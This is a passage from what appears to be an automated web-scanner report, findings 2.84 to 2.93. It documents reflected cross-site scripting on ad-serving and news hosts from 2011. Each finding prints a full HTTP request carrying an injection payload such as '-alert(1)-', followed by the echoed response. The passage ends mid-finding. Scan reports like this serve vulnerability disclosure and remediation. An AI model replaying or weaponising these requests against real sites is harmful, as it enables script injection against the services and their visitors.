The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81450"-alert(1)-"a8455fefa1a was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=2881450"-alert(1)-"a8455fefa1a&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CEF8081690D6E9E07703051E14EAEF7F; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=2881450"-alert(1)-"a8455fefa1a&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   
...[SNIP]...

2.84. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [cn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the cn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 957da"-alert(1)-"78ec1831ab6 was submitted in the cn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb957da"-alert(1)-"78ec1831ab6&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F1F0E0C0EAEF9DD5E89E5026D7B2B06C; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb957da"-alert(1)-"78ec1831ab6&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$
...[SNIP]...

2.85. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbdb4"-alert(1)-"d71fc6467dd was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250dbdb4"-alert(1)-"d71fc6467dd&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6C95250B28D8036DD98940A9996ED89B; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250dbdb4"-alert(1)-"d71fc6467dd&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   
...[SNIP]...

2.86. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d076c"-alert(1)-"1445d99a69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$&d076c"-alert(1)-"1445d99a69b=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44720CDF40B1E1003F60667678267C13; Path=/
Content-Type: text/javascript
Content-Length: 8046
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$&d076c"-alert(1)-"1445d99a69b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=functi
...[SNIP]...

2.87. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ncu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7d6c"-alert(1)-"80b9417c1c7 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$e7d6c"-alert(1)-"80b9417c1c7 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CD7729D9C7FC8F4643AA4077B8F2FE0A; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$e7d6c"-alert(1)-"80b9417c1c7",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function
...[SNIP]...

2.88. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4390c"-alert(1)-"b19235bef5c was submitted in the ord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=26605524390c"-alert(1)-"b19235bef5c&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=091B0556134C33307EDDBD3CA4F49AA5; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=26605524390c"-alert(1)-"b19235bef5c&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl : "",
   reqquery : "
...[SNIP]...

2.89. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [pli parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the pli request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f5b8"-alert(1)-"63705da3f9a was submitted in the pli parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=23206958f5b8"-alert(1)-"63705da3f9a&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EE59EBF0BC8D542B7477BE784AA60A6E; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=23206958f5b8"-alert(1)-"63705da3f9a&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep :
...[SNIP]...

2.90. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44ad2"-alert(1)-"8cca0a3c179 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=30044ad2"-alert(1)-"8cca0a3c179&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4ED83BE5AD07FABADC71565EC8709ACE; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:51 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=30044ad2"-alert(1)-"8cca0a3c179&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   requrl :
...[SNIP]...

2.91. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /asp/usatly/handler.ashx

Issue detail

The value of the longUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7f74'%3balert(1)//9b90896c602 was submitted in the longUrl parameter. This input was echoed as e7f74';alert(1)//9b90896c602 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /asp/usatly/handler.ashx?longUrl=e7f74'%3balert(1)//9b90896c602 HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Mon, 09 May 2011 15:38:05 GMT
Connection: close
Content-Length: 140

var usatlyshorturl = 'e7f74';alert(1)//9b90896c602'; // Currently only the following domains are supported: usatoday.com,usatodayeducate.com

2.92. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd65'-alert(1)-'9350f9133f9 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=AQAAAAAADEAAAAAAAAAMQAAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAehMn5gAAAAA.&tt_code=vert-107&udj=uf%28%27a%27%2C+9797%2C+1304955326%29%3Buf%28%27c%27%2C+45814%2C+1304955326%29%3Buf%28%27r%27%2C+173255%2C+1304955326%29%3Bppv%288991%2C+%277215316608111068896%27%2C+1304955326%2C+1304998526%2C+45814%2C+25553%29%3B&cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU.8dd65'-alert(1)-'9350f9133f9&referrer=http://www.csmonitor.com/Business&pp=TcgJqwAJrDQK5ToFmVxG_jr_KjIn-i4M6rRykw&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:35:46 GMT
Content-Length: 1385

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAA
...[SNIP]...
CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU.8dd65'-alert(1)-'9350f9133f9/referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEE
...[SNIP]...

2.93. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9c43'%3balert(1)//bb09889184a was submitted in the redir parameter. This input was echoed as f9c43';alert(1)//bb09889184a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

